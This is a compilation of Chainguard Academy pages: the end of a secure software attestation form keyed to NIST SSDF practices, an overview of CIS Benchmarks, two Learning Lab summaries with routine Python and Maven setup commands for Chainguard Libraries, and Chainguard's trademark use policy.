- a) Separating and protecting each environment involved in developing and building software; (4e(i)(A): PO.5.1)
- b) Regularly logging, monitoring, and auditing trust relationships used for authorization and access: i) to any software development and build environments; and ii) among components within each environment; (4e(i)(B): PO.5.1)
- c) Enforcing multi-factor authentication and conditional access across the environments relevant to developing and building software in a manner that minimizes security risk; (4e(i)(C): PO.5.1, PO.5.2)
- d) Taking consistent and reasonable steps to document, as well as minimize use or inclusion of software products that create undue risk, within the environments used to develop and build software; (4e(i)(D): PO.5.1)
- e) Encrypting sensitive data, such as credentials, to the extent practicable and based on risk; (4e(i)(E): PO.5.2)
- f) Implementing defensive cyber security practices, including continuous monitoring of operations and alerts and, as necessary, responding to suspected and confirmed cyber incidents. (4e(i)(F): PO.3.2, PO.3.3, PO.5.1, PO.5.2)

2) The software producer has made a good-faith effort to maintain trusted source code supply chains by: a) Employing automated tools or comparable processes; and b) Establishing a process that includes reasonable steps to address the security of third-party components and manage related vulnerabilities. (4e(iii): PO.1.1, PO.3.1, PO.3.2, PO.5.1, PO.5.2, PS.1.1, PS.2.1, PS.3.1, PW.4.1, PW.4.4, PW.7.1, PW.8.1, RV.1.1)

3) The software producer maintains provenance data for internal and third-party code incorporated into the software. (4e(vi): PO.1.3, PO.3.2, PO.5.1, PO.5.2, PS.3.1, PS.3.2, PW.4.1, PW.4.4, RV.1.1, RV.1.2)

4) The software producer employed automated tools or comparable processes that check for security vulnerabilities. In addition: a) The software producer ensured these processes operate on an ongoing basis and, at a minimum, prior to product, version, or update releases; b) The software producer has a policy or process to address discovered security vulnerabilities prior to product release; and c) The software producer operates a vulnerability disclosure program and accepts, reviews, and addresses disclosed software vulnerabilities in a timely fashion. (4e(iv): PO.4.1, PO.4.2, PS.1.1, PW.2.1, PW.4.4, PW.5.1, PW.6.1, PW.6.2, PW.7.1, PW.7.2, PW.8.2, PW.9.1, PW.9.2)

References

The table of references comes from the top of the original RFC PDF. Reprinted courtesy of the National Institute of Standards and Technology, U.S. Department of Commerce. Not copyrightable in the United States.

---

### Overview of CIS Benchmarks

URL: https://edu.chainguard.dev/software-security/compliance/cis-benchmarks/
Last Modified: September 18, 2024
Tags: COMPLIANCE, STANDARDS

The Center for Internet Security (CIS) is a nonprofit organization dedicated to enhancing the cybersecurity posture of organizations worldwide. Founded in 2000, CIS aims to develop best practices and guidelines that help organizations protect themselves against cyber threats. CIS’s mission is to foster collaboration among security professionals, policymakers, and industry leaders to safeguard both public and private organizations against cyber threats. One of the ways it does this is by publishing CIS Benchmarks: a set of recommendations that, when applied to a given tool, can help to harden it against threats. This conceptual article serves as a high-level overview of CIS Benchmarks.
What are CIS Benchmarks?

As mentioned in the introduction, CIS Benchmarks are a set of best practices and configuration guidelines designed to improve the security of various systems, applications, and networks. These benchmarks are widely recognized as authoritative standards for securing IT systems, and are developed through a consensus-driven process involving industry experts.

CIS Benchmarks cover a wide range of platforms, including operating systems, cloud providers, web browsers, network devices, and application software. Each benchmark provides detailed recommendations and prescriptive guidance on how to configure systems securely. They focus on areas such as user access controls, password policies, and network security settings. By following CIS Benchmarks, organizations can significantly reduce their vulnerability to cyber threats. Additionally, many regulatory frameworks and standards recognize CIS Benchmarks, making them useful for achieving compliance.

You can find the full list of available CIS Benchmarks on the CIS website.

Structure of CIS Benchmarks

CIS Benchmarks are distributed as PDF documents from the CIS website at no cost. After completing the CIS Benchmarks PDF download form, you can access all the Benchmark documents.

Note: By signing up for a CIS SecureSuite Membership, you can download Benchmarks in a variety of other formats, including Word or Excel documents.

CIS Benchmarks start with a brief overview of what they cover and lay out any typographical conventions or definitions specific to the Benchmark. They also define configuration profiles, which can help users understand what recommendations they actually need to implement. For example, the CIS Google Chrome Benchmark has two profiles: Level 1 is for general use in Corporate/Enterprise environments and Level 2 is for High Security or Sensitive Data environments that only need limited functionality. In this case, Level 2 is an extension of Level 1; any recommendations for organizations that fit the Level 1 profile should also be implemented for Level 2 organizations, but not vice versa.

The Benchmark will then go into individual recommendations relating to the tool it covers. These recommendations typically have the following fields:

- Profile Applicability: the configuration profile (mentioned above) which the recommendation applies to
- Description: a brief description of the recommendation
- Rationale: the reasoning for the recommendation, with details on how it can improve security
- Impact: the effect that implementing the recommendation would have on the tool’s default behavior
- Audit: details on how you can check whether the recommendation has been implemented
- Remediation: details on how to establish the recommended configuration
- Default Value: the tool’s default value, before the recommendation has been implemented
- References: a list of resources which informed CIS’s recommendation
- CIS Controls: the relevant CIS Controls for the recommendation

Regarding this last bullet, CIS Controls are more high-level recommendations than Benchmarks. CIS Benchmarks are best practices for specific tools, while CIS Controls are more simplified general recommendations that can be applied to a variety of technologies.

Learn more

By implementing CIS Benchmarks, organizations not only improve their security against evolving cyber threats but also align with regulatory standards, ensuring compliance and minimizing risks. To explore the full range of benchmarks and start implementing these best practices, visit the CIS website today.
Additionally, you may find our resources on other compliance frameworks to be of interest.

---

### Chainguard Libraries for Python

URL: https://edu.chainguard.dev/software-security/learning-labs/ll202506/
Last Modified: June 25, 2025
Tags: Learning Labs, Chainguard Libraries, Python

The June 2025 Learning Lab with Patrick Smyth covers Chainguard Libraries for Python. Open source libraries help you move fast, but pulling in external dependencies can introduce supply chain risk. This session covers fundamental concepts of Chainguard Libraries, package managers and dependencies, PyPI and build tools, configuring repository managers, and running example application builds.

Sections

- 0:00 Introduction and welcome
- 0:54 Patrick Smyth introduction and background
- 1:47 Chainguard! Who are we?
- 2:47 Chainguard Containers and the “boss assigned me to fix Ubuntu” problem
- 4:12 Introduction to Chainguard Libraries for Python
- 5:04 Python libraries fundamentals - modules, packages, and libraries
- 6:34 The dependency graph problem and modern ecosystem challenges
- 8:57 PyPI (Python Package Index) overview and infrastructure
- 10:53 Supply chain attacks on the rise and threats to the Python ecosystem
- 11:39 Supply chain meme calendar - an attack every month this year
- 13:54 Anatomy of supply chain attacks and attack vectors
- 17:43 Chainguard Libraries!
- 19:34 Chainguard Factory overview and operational security
- 21:33 Case study: Ultralytics YOLO December 2024 attack
- 23:22 Technical caveats and requirements for Chainguard Libraries
- 25:06 Demo introduction and Flask project overview
- 27:48 Accessing demo materials on Chainguard Academy
- 29:00 Demo: Cloning and setting up the Flask project
- 31:17 Demo: Creating virtual environment and installing from PyPI
- 33:06 Demo: Running Flask application and testing with libCheck tool
- 34:28 Demo: Configuring pip for Chainguard Libraries via repository manager
- 36:19 Demo: Installing dependencies from Chainguard Libraries
- 37:02 Demo: Verification with libCheck
- 38:22 Demo: Containerizing the demo application
- 40:25 Demo: Building and running containerized Flask application
- 41:41 Additional configuration options and documentation resources
- 42:19 Q&A: Repository manager setup and configuration
- 43:26 Q&A: Architecture support and glibc requirements
- 44:34 Q&A: libCheck tool open source plans and detailed output
- 46:05 Q&A: CVE scanning with Grype and vulnerability management

Demo

In the demo, we switch a Flask application to use Chainguard Libraries for Python, sourcing dependencies from a repository manager (Artifactory) set up to pull first from the Chainguard Libraries for Python index with a fallback to the Python Package Index (PyPI).

Demo Flask Application

We demonstrate two approaches. First, we modify the ~/.pip/pip.conf file to pull from the virtual repository set up in the repository manager:

[global]
index-url = <repository-url>

After changing this global setting, we install and run the application from a virtual environment, then use Chainguard’s libCheck tool to test the provenance of the packages in the virtual environment. Chainguard is in the process of releasing this tool under an open source license. We also update the demo application’s requirements.txt file and build and run the application from a Chainguard Container.
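To make the pip side of that setup concrete, here is a minimal sketch under stated assumptions: your repository manager already exposes a virtual PyPI repository that resolves from the Chainguard Libraries for Python index first and falls back to PyPI, and the index URL and repository name below are placeholders for your own environment rather than real Chainguard endpoints.

```sh
# Minimal sketch, assuming a virtual PyPI repository already exists in your
# repository manager; the URL and "python-virtual" name are placeholders.
python3 -m venv venv
. venv/bin/activate

# Point pip at the virtual repository globally via ~/.pip/pip.conf.
mkdir -p ~/.pip
cat > ~/.pip/pip.conf <<'EOF'
[global]
index-url = https://<your-repository-manager>/artifactory/api/pypi/python-virtual/simple
EOF

# Reinstall the application's dependencies so they resolve through the
# repository manager instead of directly from PyPI.
pip install --no-cache-dir -r requirements.txt
```

If you prefer not to change the global configuration, the same index can be set for a single invocation with pip’s --index-url flag or the PIP_INDEX_URL environment variable.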
Resource Links

- Event page
- Slide deck
- Chainguard Libraries
- Chainguard Libraries documentation
- Chainguard Libraries for Python documentation
- Python global configuration
- Python build configuration
- Python Package Index (PyPI)
- pip documentation
- Python Packaging User Guide
- Cheese Must Stand: Defending the Python Library Ecosystem in 2025 at PyCon 2025

---

### Chainguard Libraries for Java

URL: https://edu.chainguard.dev/software-security/learning-labs/ll202505/
Last Modified: June 18, 2025
Tags: Learning Labs, Chainguard Libraries, Overview

The May 2025 Learning Lab with Manfred Moser covers Chainguard Libraries for Java. It starts with an overview about libraries and the Java ecosystem and progresses to a demo with Apache Maven and Sonatype Nexus.

Sections

- 0:00 Introduction and agenda
- 2:38 Chainguard and containers
- 3:47 Chainguard Factory
- 4:57 Concepts - from containers to libraries
- 9:00 Java and Java libraries
- 12:45 Software supply chain of libraries and attacks
- 19:27 Dependency supply in Java
- 20:30 Repository concept and Maven Central
- 24:32 Chainguard Libraries for Java and repository manager intro
- 28:17 Developer tools
- 29:21 Demo start and setup with chainctl
- 32:55 Sonatype Nexus configuration
- 37:30 Maven configuration
- 40:41 Example project setup, build, and results
- 44:57 Dependency list and tree
- 47:00 Results and verification
- 49:37 Summary
- 50:43 Up next
- 52:55 Questions

Demo

Following are some of the commands used in the demo. More information can be found in the slide deck, the linked resources, and the video.

Creating a pull token:

chainctl auth login
chainctl libraries entitlements list
chainctl auth pull-token --library-ecosystem=java --ttl=1h

Cleaning up the local Maven repository cache:

rm -rf ~/.m2/repository

Building Trino Gateway from source and looking at dependencies:

cd trino-gateway
./mvnw clean install -DskipTests=true
./mvnw dependency:list
./mvnw dependency:tree

Resource Links

- Chainguard Libraries
- Chainguard Libraries documentation
- Chainguard Libraries for Java documentation
- Slide deck
- Apache Maven
- Sonatype Nexus Repository
- Apache Maven dependency plugin

---

### Chainguard Trademark Use Policy

URL: https://edu.chainguard.dev/software-security/trademark/
Last Modified: December 6, 2024
Tags: Reference, Product, Wolfi

Chainguard has a Trademark Use Policy for Chainguard™ and Wolfi™. The Trademark Use Policy for Chainguard™ is in connection with its software tools and platforms for container image registry services and related educational services. The Trademark Use Policy for Wolfi™ is in connection with software tools and related community services. This policy helps ensure that Chainguard’s trademarks remain reliable indicators of the qualities that they are meant to preserve.

The Trademark Policy details:

- How you may use Chainguard’s trademarks,
- Scenarios where trademark use is not permitted,
- When Chainguard’s permission may be required to use a given trademark.

Under Chainguard’s Trademark Policy, when using the free-tier Chainguard Starter Containers and Wolfi components, artifacts that are created by you must clearly delineate which software is installed by you (instead of Chainguard) in such a way that it is clear to vulnerability scanners and end users that you are the author of said changes to the software and not Chainguard. Further, if you attempt to rebuild Chainguard packages or Containers from source, you must remove all references to Chainguard or Wolfi in adherence to the Trademark Policy.
How not to use Chainguard Trademarks

Chainguard Marks must not be used in a way that is confusing, false, or misleading, or that implies affiliation, endorsement, or sponsorship where it does not exist. In connection with the same, similar, or related goods or services, it is not permitted to:

- Misspell, hyphenate, abbreviate, or otherwise change Chainguard Marks (as in Chain guard, Chain-guard, W0lfi, etc.),
- Transliterate or translate Chainguard Marks,
- Use marks that are confusingly similar to the Chainguard Marks (such as Chainguardian, Wolfy, etc.),
- Combine the Chainguard Marks with other words or symbols.

The above non-exhaustive examples are all considered to be confusing, false, or misleading uses of the Chainguard Marks.

Below are non-exhaustive examples of how you may not use the Chainguard Marks:

- In the name of your business, products, service, app, publication, domain name, subdomain, or other offering,
- More prominently than your own company name, product, or service,
- On merchandise or other promotional goods for sale,
- In any other forms of commercial use, unless it’s for truthful descriptive reference to Chainguard products or services.

Chainguard remains committed to open source licensing principles, which primarily concern copyright associated with software. The Chainguard Trademark Policy clearly defines how the organization is protecting consumers as to what products and services are coming from Chainguard and therefore meet relevant security guarantees. You can review the full Chainguard Trademark Policy or find additional information in our Open Source FAQ.

---